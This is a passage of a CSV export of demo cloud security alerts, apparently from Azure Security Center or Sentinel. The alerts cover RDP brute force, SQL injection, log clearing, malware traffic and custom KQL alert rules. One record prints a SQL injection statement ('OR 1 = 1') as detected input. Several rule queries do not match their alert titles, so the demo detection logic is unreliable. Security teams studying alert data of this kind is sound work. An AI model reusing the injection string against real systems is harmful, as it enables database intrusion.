14,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-05 02:02:00,2019-01-05 02:02:00,7f042810-8657-44e2-93ba-318ba108e3d6,8832e816-d634-4214-bb48-7a6678fdf0b7,InternalDemo,Microsoft,Failed RDP Brute Force Attack,Failed RDP Brute Force Attack,Failed RDP Brute Force Attack,"Several Remote Desktop login attempts were detected from FreeRDP (96.81.218.10), none of them succeeded.
Event logs analysis shows that in the last 48 minutes there were 93 failed attempts.
32 of the failed login attempts aimed at non-existent users.
1 of the failed login attempts aimed at existing users.",Low,False,"{
""source"": ""FreeRDP (96.81.218.10)"",
""successful logins"": ""0"",
""attack duration"": ""48 minutes"",
""failed attempts"": ""93"",
""non-existent users"": ""32"",
""existing users"": ""1"",
""ActionTaken"": ""Detected"",
""resourceType"": ""Virtual Machine""
}","[
{
""$id"": ""4"",
""HostName"": ""vm1"",
""AzureID"": ""/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm1"",
""Type"": ""host""
}
]",Unknown,,"[
{
""Href"": ""https://v7cvxo4erctvostor.blob.core.windows.net/20170816-13/MSTI-TS-RDP-Brute-Forcing.pdf?sv=2015-12-11&sig=jgHYwnnNiM3vj6wbCse9e2cpMmrTuHd6nhzxJxmqv3s%3D&spr=https&se=2017-11-23T13%3A00%3A34Z&srt=o&ss=b&sp=r"",
""Category"": ""enrichment_tas_threat__reports"",
""Label"": ""Report: RDP Brute Forcing"",
""Type"": ""webLink""
}
]",,,2019-01-12 00:02:51,/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm1,,
15,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-07 05:02:00,2019-01-07 05:02:00,b29906e3-91b3-427f-8d93-efe648ade3ac,775505ce-0ef9-4945-b697-303f7666d1b6,InternalDemo,Microsoft,Modified system binary discovered in dump file 5bd767e4-2d08-4714-b744-aaed04b57107__391365252.hdmp,Modified system binary discovered in dump file 5bd767e4-2d08-4714-b744-aaed04b57107__391365252.hdmp,Modified system binary discovered in dump file 5bd767e4-2d08-4714-b744-aaed04b57107__391365252.hdmp,"Azure Security Center detected an image mismatch on a loaded module in memory during analysis of a crash dump. If the presence of this module is unexpected, it may indicate a system compromise.",High,False,"{
""DumpFile"": ""5bd767e4-2d08-4714-b744-aaed04b57107__391365252.hdmp"",
""ProcessName"": ""lync.exe"",
""ProcessVersion"": ""16.0.6001.1078"",
""ModuleName1"": ""ntdll"",
""ModuleVersion1"": ""6.3.9600.18233"",
""ActionTaken"": ""Detected"",
""resourceType"": ""Virtual Machine""
}","[
{
""$id"": ""4"",
""HostName"": ""vm3"",
""AzureID"": ""/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm3"",
""Type"": ""host""
}
]",Unknown,,,,,2019-01-12 00:02:51,/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm3,,
16,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-01 00:02:00,2019-01-01 00:02:00,1d736be8-babe-40d5-811d-f443b124e45a,48facfa1-fe35-45ff-8c91-7a710cd462b9,InternalDemo,Microsoft,An event log was cleared,An event log was cleared,An event log was cleared,Machine logs indicate a suspicious event log clearing operation by user: 'internalUser' in Machine: 'vm3'. The Security log was cleared.,Low,False,"{
""domain name"": ""Contoso"",
""user name"": ""internalUser"",
""machine name"": ""vm3"",
""log channel"": ""Security"",
""ActionTaken"": ""Detected"",
""resourceType"": ""Virtual Machine""
}","[
{
""$id"": ""4"",
""HostName"": ""vm3"",
""AzureID"": ""/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm3"",
""Type"": ""host""
},
{
""$id"": ""5"",
""Name"": ""internaluser"",
""NTDomain"": ""contoso"",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": true,
""Type"": ""account""
}
]",Unknown,,,,,2019-01-12 00:02:51,/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm3,,
17,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-06 04:02:00,2019-01-06 04:02:00,217a7303-a603-461d-b0eb-6586b8227a26,7b27ffab-7204-4856-a013-908de6c1804e,InternalDemo,Microsoft,Multiple Domain Accounts Queried,Multiple Domain Accounts Queried,Multiple Domain Accounts Queried,"Analysis of host data has determined that an unusual number of distinct domain accounts are being queried within a short time period from vm1 in your subscription. This kind of activity could be legitimate, but can also be an indication of compromise.",Low,False,"{
""Number of Queried Accounts Observed in 24 Hours"": ""8"",
""Latest Account Queried"": ""ContosoUser"",
""Compromised Host"": ""vm1"",
""Full Command"": ""net user ContosoUser /domain"",
""Queried By"": ""admin"",
""ActionTaken"": ""Detected"",
""resourceType"": ""Virtual Machine""
}",,Unknown,,,,,2019-01-12 00:02:51,/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm1,,vm1
18,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-05 01:02:00,2019-01-05 01:02:00,59f71190-b478-403a-81b1-5e163dd538e3,0c68e539-f060-401f-b967-6b64b8f49198,InternalDemo,F5 WAF,SQL injection blocked,SQL injection blocked,SQL injection blocked,SQL-Injection,Low,False,"{
""Hit Count"": ""6"",
""Source IPs"": ""[\""96.81.218.10\""]"",
""Management URL"": ""https://40.86.96.115:8443"",
""ActionTaken"": ""Detected"",
""resourceType"": ""Virtual Machine""
}","[
{
""$id"": ""4"",
""HostName"": ""vm1"",
""AzureID"": ""/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm1"",
""Type"": ""host""
}
]",Unknown,,,,,2019-01-12 00:02:51,/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm1,,
19,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-09 05:02:00,2019-01-09 05:02:00,df47a8d3-472e-4323-9c2a-de8a0aec77e0,5fc4f6a0-0687-4b93-998e-a230af39c10b,InternalDemo,Deep Security Agent,Deep Security Agent detected a malware,Deep Security Agent detected a malware,Deep Security Agent detected a malware,Deep Security Agent detected a malware,Low,False,"{
""Malware"": ""Cookie_DoubleClick"",
""Infected Resource"": ""Internet Explorer Cache"",
""ScanAction"": ""Delete"",
""ScanResult"": ""SUCCESS"",
""Type"": ""AntiMalware"",
""ActionTaken"": ""Detected"",
""resourceType"": ""Virtual Machine""
}","[
{
""$id"": ""4"",
""HostName"": ""vm4"",
""AzureID"": ""/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm4"",
""Type"": ""host""
}
]",Unknown,,,,,2019-01-12 00:02:51,/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm4,,
20,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-06 02:02:00,2019-01-06 02:02:00,e5e1e112-43df-4a5d-abcf-713e56ca29b6,3b2b5ecc-ec29-4703-9450-29b29b937fd8,InternalDemo,Microsoft,Successful RDP brute force attack,Successful RDP brute force attack,Successful RDP brute force attack,"Several Remote Desktop login attempts were detected from FreeRDP (96.81.218.10), some of which were able to successfully login to the machine.
Event logs analysis shows that in the last 30 minutes there were 60 failed attempts.
20 of the failed login attempts aimed at non-existent users.
1 of the failed login attempts aimed at existing users.",High,False,"{
""source"": ""FreeRDP (96.81.218.10)"",
""successful logins"": ""1"",
""attack duration"": ""30 minutes"",
""failed attempts"": ""60"",
""non-existent users"": ""20"",
""existing users"": ""1"",
""ActionTaken"": ""Detected"",
""resourceType"": ""Virtual Machine""
}","[
{
""$id"": ""4"",
""HostName"": ""vm1"",
""AzureID"": ""/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm1"",
""Type"": ""host""
}
]",Unknown,,"[
{
""Href"": ""https://v7cvxo4erctvostor.blob.core.windows.net/20170816-13/MSTI-TS-RDP-Brute-Forcing.pdf?sv=2015-12-11&sig=jgHYwnnNiM3vj6wbCse9e2cpMmrTuHd6nhzxJxmqv3s%3D&spr=https&se=2017-11-23T13%3A00%3A34Z&srt=o&ss=b&sp=r"",
""Category"": ""enrichment_tas_threat__reports"",
""Label"": ""Report: RDP Brute Forcing"",
""Type"": ""webLink""
}
]",,,2019-01-12 00:02:51,/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm1,,
21,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-06 03:02:00,2019-01-06 03:02:00,bbf11a79-0ab2-4ee7-b2ec-1ad95890c9bc,614ae18e-cd79-4d4c-97dc-24431be12b5b,InternalDemo,Microsoft,Suspicious SVCHOST process executed,Suspicious SVCHOST process executed,Suspicious SVCHOST process executed,The system process SVCHOST was observed running in an abnormal context. Malware often use SVCHOST to masquerade its malicious activity.,Low,False,"{
""domain name"": ""hpc"",
""user name"": ""E2EINTVM2$"",
""process name"": ""C:\\AlertGeneration\\svchost.exe"",
""command line"": ""C:\\AlertGeneration\\svchost.exe"",
""parent process"": ""-"",
""process id"": ""0x12c"",
""user sid"": ""S-1-5-18"",
""ActionTaken"": ""Detected"",
""resourceType"": ""Virtual Machine""
}","[
{
""$id"": ""4"",
""HostName"": ""vm1"",
""AzureID"": ""/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm1"",
""Type"": ""host""
},
{
""$id"": ""5"",
""Name"": ""e2eintvm2$"",
""NTDomain"": ""hpc"",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": true,
""Type"": ""account""
},
{
""$id"": ""6"",
""Directory"": ""c:\\alertgeneration"",
""Name"": ""svchost.exe"",
""Type"": ""file""
},
{
""$id"": ""7"",
""CommandLine"": ""C:\\AlertGeneration\\svchost.exe"",
""ImageFile"": {
""$ref"": ""6""
},
""Account"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
}
]",Unknown,,"[
{
""Href"": ""https://v7cvxo4erctvostor.blob.core.windows.net/20170815-13/MSTI-TS-Suspicious-SVCHost.pdf?sv=2015-12-11&sig=8FlMfUQOaSDAvU7Ebt%2BC8idOLrah%2Fsz4yjr0iPIblS4%3D&spr=https&se=2017-11-22T13%3A44%3A45Z&srt=o&ss=b&sp=r"",
""Category"": ""enrichment_tas_threat__reports"",
""Label"": ""Report: Suspicious SVCHost"",
""Type"": ""webLink""
}
]",,,2019-01-12 00:02:51,/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm1,,
22,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-10 05:02:00,2019-01-10 05:02:00,83eeb504-3c2c-4c64-b309-f48653863bdd,5365ee7a-f730-42d2-bcdf-b2e898ab98d7,InternalDemo,Microsoft,Potential SQL Injection,Potential SQL Injection,Potential SQL Injection,Potential Sql Injection was detected on your database lianadb on server sqlserver2ascdemo.database.windows.net,High,False,"{
""Database"": ""sqli_users"",
""Server"": ""sqlserver2ascdemo.database.windows.net"",
""Principal name"": ""CONTOSOADMIN"",
""Application"": "".Net SqlClient Data Provider"",
""IP address"": ""13.33.36.3"",
""Vulnerable statement"": ""SELECT * FROM sqli_users WHERE username = 'user' AND password = \"" OR 1 = 1-'"",
""Potential causes"": ""Defect in application code constructing faulty SQL statements; application code doesn't sanitize user input and may be exploited to inject malicious SQL statements."",
""ActionTaken"": ""Detected"",
""resourceType"": ""SQL Server""
}","[
{
""$id"": ""4"",
""HostName"": ""sqlserver2ascdemo"",
""AzureID"": ""/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourceGroups/testingLab/providers/Microsoft.Sql/servers/myServer/databases/sqlserver2ascdemo"",
""Type"": ""host""
}
]",Unknown,,,,,2019-01-12 00:02:51,/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourceGroups/testingLab/providers/Microsoft.Sql/servers/myServer/databases/sqlserver2ascdemo,,
23,802d39e1-9d70-404d-832c-2de5e2478eda,2018-12-30 00:02:00,2018-12-30 00:02:00,daf0ba4a-d1f9-4ac9-ac59-fa2077c8134d,a511e1bb-69e1-41a2-8054-c6fcb6aa2362,InternalDemo,Microsoft,Network communication with a malicious machine detected,Network communication with a malicious machine detected,Network communication with a malicious machine detected,"Network traffic analysis indicates that your machine (IP 1.2.3.5) has communicated with what is possibly a Command and Control center for a malware of type AldiBot at IP 183.95.154.13. AldiBot is an HTTP-controlled denial-of-service bot - it offers HTTP and TCP DDoS capabilities along with Firefox, Pidgin and jDownloader credential theft, the creation of a SOCKS5 proxy on infected machine, and the ability to download and execute malicious code of the attacker’s choice.",Medium,False,"{
""Attacker Port"": ""80"",
""Attacker IP"": ""183.95.154.13"",
""Victim Port"": ""23132"",
""Victim IP"": ""1.2.3.5"",
""ActionTaken"": ""Detected"",
""resourceType"": ""Virtual Machine""
}","[
{
""$id"": ""4"",
""HostName"": ""vm4"",
""AzureID"": ""/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm4"",
""Type"": ""host""
},
{
""$id"": ""5"",
""Address"": ""183.95.154.13"",
""Location"": {
""CountryCode"": ""CN"",
""CountryName"": ""China"",
""State"": ""Hubei"",
""City"": ""Wuhan"",
""Longitude"": 114.28946,
""Latitude"": 30.55397,
""Asn"": 4837
},
""Type"": ""ip""
}
]",Unknown,,,,,2019-01-12 00:02:51,/subscriptions/212f9889-769e-45ae-ab43-6da33674bd26/resourcegroups/ASCDEMORG/providers/Microsoft.Compute/virtualMachines/vm4,,
24,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-11 05:38:06,2019-01-12 05:38:06,92f52d58-c6c4-426a-ae31-45693e585c9e,6b56aa8c-da76-4caf-b09d-8706292a8b89,CustomAlertRule,Alert Rule,Global domain trust creation - Demo,Global domain trust creation - Demo,Global domain trust creation - Demo,Global domain trust was created on Active Directory,High,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""23.54.94.45\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = \\\""[email protected]\\\""\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-12T05%3A38%3A06.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""23.54.94.45\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = \\\""[email protected]\\\""\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""22668"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""1"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""1000"",
""Total IP Entities"": ""1"",
""Total Account Entities"": ""1"",
""Total Host Entities"": ""1""
}","[
{
""$id"": ""3"",
""Address"": ""23.54.94.45"",
""Type"": ""ip"",
""Count"": 22668
},
{
""$id"": ""4"",
""HostName"": ""DHCPContoso77"",
""Type"": ""host"",
""Count"": 22668
},
{
""$id"": ""5"",
""Name"": ""brians"",
""UPNSuffix"": ""ContosoSI.onmicrosoft.com"",
""IsDomainJoined"": true,
""Type"": ""account"",
""Count"": 22668
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-12 05:48:11,,,
25,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-11 06:25:57,2019-01-12 06:25:57,5f98d315-1e47-47b4-98c5-365a9d0028f2,4586bd9e-5c1e-4229-9a01-ecd84ad51448,CustomAlertRule,Alert Rule,Maliciuos IP communication,Maliciuos IP communication,Maliciuos IP communication,Maliciuos IP communication was identified based on TI,High,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""80.10.26.89\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-12T06%3A25%3A57.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""80.10.26.89\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""22992"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""1"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""0"",
""Total Account Entities"": ""1565"",
""Total IP Entities"": ""1"",
""Total Host Entities"": ""1""
}","[
{
""$id"": ""3"",
""Address"": ""80.10.26.89"",
""Type"": ""ip"",
""Count"": 22992
},
{
""$id"": ""4"",
""HostName"": ""DHCPContoso77"",
""Type"": ""host"",
""Count"": 22992
},
{
""$id"": ""5"",
""Name"": ""ADMINISTRATOR"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 5924
},
{
""$id"": ""6"",
""Name"": ""ADMIN"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 877
},
{
""$id"": ""7"",
""Name"": ""USER"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 482
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-12 06:36:03,,,
26,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-12 19:18:10,2019-01-12 20:18:10,6bbe2849-3194-4276-afbb-89dcefa9038a,d4638075-fed2-4031-8e52-d37c220b0fe4,CustomAlertRule,Alert Rule,Suspicious Account Added,Suspicious Account Added,Suspicious Account Added,Account added and removed from group within 24h,Medium,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""OfficeActivity\\n| where Operation in (\\\""Add member to group.\\\"", \\\""Remove member from group.\\\"") \\n| project TimeGenerated, Operation, user=todynamic(AADTarget)[0].ID\\n| summarize operations=dcount(Operation) by tostring(user), bin(TimeGenerated, 1d)\\n| where operations>1 and user startswith \\\""User\\\""\"",\""timeInterval\"":{\""intervalDuration\"":3600,\""intervalEnd\"":\""2019-01-12T20%3A18%3A10.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""OfficeActivity\\n| where Operation in (\\\""Add member to group.\\\"", \\\""Remove member from group.\\\"") \\n| project TimeGenerated, Operation, user=todynamic(AADTarget)[0].ID\\n| summarize operations=dcount(Operation) by tostring(user), bin(TimeGenerated, 1d)\\n| where operations>1 and user startswith \\\""User\\\""\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""1"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""0"",
""Query Interval in Minutes"": ""60"",
""Suppression in Minutes"": ""720""
}",,Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-12 20:28:24,,,
27,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-09 06:33:55,2019-01-10 06:33:55,b530adbb-40b3-4c69-8590-0e8ac8f4bc69,78cc7e02-6116-459d-9cdc-a6dcc40ba937,CustomAlertRule,Alert Rule,DC with MS AM engine failure - Demo,DC with MS AM engine failure - Demo,DC with MS AM engine failure - Demo,Domain controllers with Microsoft antimalware core engine failure,Low,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-10T06%3A33%3A55.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""11661"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""0"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""0""
}",,Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-10 06:43:59,,,
28,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-09 06:31:40,2019-01-10 06:31:40,9d815c5c-e4f2-4430-8be3-fee253574411,ace7fb98-ef96-46df-ba7b-9a15a141d368,CustomAlertRule,Alert Rule,DC local group addition - Demo,DC local group addition - Demo,DC local group addition - Demo,Domain controllers local group addition,Low,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""75.10.91.22\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-10T06%3A31%3A40.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""75.10.91.22\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""11687"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""10000"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""800"",
""Total Account Entities"": ""1713"",
""Total IP Entities"": ""1"",
""Total Host Entities"": ""1""
}","[
{
""$id"": ""3"",
""Address"": ""75.10.91.22"",
""Type"": ""ip"",
""Count"": 11687
},
{
""$id"": ""4"",
""HostName"": ""DHCPContoso77"",
""Type"": ""host"",
""Count"": 11687
},
{
""$id"": ""5"",
""Name"": ""ADMINISTRATOR"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 3831
},
{
""$id"": ""6"",
""Name"": ""Administrator"",
""NTDomain"": ""DHCPContoso77"",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 2162
},
{
""$id"": ""7"",
""Name"": ""ADMIN"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 720
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-10 06:41:45,,,
29,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-09 06:31:42,2019-01-10 06:31:42,ef9c04cb-333b-4465-9c62-55adc621d051,40a5916b-9697-423a-a5e4-95cca7c735e7,CustomAlertRule,Alert Rule,Palo Alto admin logged on via SSH - Demo,Palo Alto admin logged on via SSH - Demo,Palo Alto admin logged on via SSH - Demo,Palo Alto admin logged on via SSH - Demo,Medium,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""92.52.10.25\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-10T06%3A31%3A42.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""92.52.10.25\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = Account\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""11687"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""10000"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""2000"",
""Total Account Entities"": ""1713"",
""Total IP Entities"": ""1"",
""Total Host Entities"": ""1""
}","[
{
""$id"": ""3"",
""Address"": ""92.52.10.25"",
""Type"": ""ip"",
""Count"": 11687
},
{
""$id"": ""4"",
""HostName"": ""DHCPContoso77"",
""Type"": ""host"",
""Count"": 11687
},
{
""$id"": ""5"",
""Name"": ""ADMINISTRATOR"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 3831
},
{
""$id"": ""6"",
""Name"": ""Administrator"",
""NTDomain"": ""DHCPContoso77"",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 2162
},
{
""$id"": ""7"",
""Name"": ""ADMIN"",
""NTDomain"": """",
""Host"": {
""$ref"": ""4""
},
""IsDomainJoined"": false,
""Type"": ""account"",
""Count"": 720
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-10 06:41:50,,,
30,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-09 05:38:06,2019-01-10 05:38:06,a7cb1196-efe7-4110-9a69-8e3c8609bd9b,9740fe80-b642-4a38-8e86-05fa4d35508b,CustomAlertRule,Alert Rule,Global domain trust creation - Demo,Global domain trust creation - Demo,Global domain trust creation - Demo,Global domain trust was created on Active Directory,High,False,"{
""Alert Mode"": ""Aggregated"",
""Search Query"": ""{\""detailBladeInputs\"":{\""id\"":\""/subscriptions/3c1bb38c-82e3-4f8d-a115-a7110ba70d05/resourcegroups/contoso77/providers/microsoft.operationalinsights/workspaces/contoso77\"",\""parameters\"":{\""q\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""23.54.94.45\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = \\\""[email protected]\\\""\"",\""timeInterval\"":{\""intervalDuration\"":86400,\""intervalEnd\"":\""2019-01-10T05%3A38%3A06.000Z\""}}},\""detailBlade\"":\""SearchBlade\"",\""displayValue\"":\""SecurityEvent\\n| where EventID == 4625\\n| extend IPCustomEntity = \\\""23.54.94.45\\\""\\n| extend HostCustomEntity = Computer\\n| extend AccountCustomEntity = \\\""[email protected]\\\""\"",\""extension\"":\""Microsoft_OperationsManagementSuite_Workspace\"",\""kind\"":\""OpenBlade\""}"",
""Search Query Results Overall Count"": ""12362"",
""Threshold Operator"": ""Greater Than"",
""Threshold Value"": ""1"",
""Query Interval in Minutes"": ""1440"",
""Suppression in Minutes"": ""1000"",
""Total Host Entities"": ""1"",
""Total IP Entities"": ""1"",
""Total Account Entities"": ""1""
}","[
{
""$id"": ""3"",
""Address"": ""23.54.94.45"",
""Type"": ""ip"",
""Count"": 12362
},
{
""$id"": ""4"",
""HostName"": ""DHCPContoso77"",
""Type"": ""host"",
""Count"": 12362
},
{
""$id"": ""5"",
""Name"": ""brians"",
""UPNSuffix"": ""ContosoSI.onmicrosoft.com"",
""IsDomainJoined"": true,
""Type"": ""account"",
""Count"": 12362
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-10 05:48:09,,,
31,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-09 06:25:57,2019-01-10 06:25:57,d71c0a28-669f-4fc5-afb8-053e34e34728,04e14d6f-6d4f-46d4-a5f6-2a26bcd34ce8,CustomAlertRule,Alert Rule,Maliciuos IP communication,Maliciuos IP communication,Maliciuos IP communication,Maliciuos IP communication was identified based on TI,High,False,"{
""Alert Mode"": ""Aggregated"",
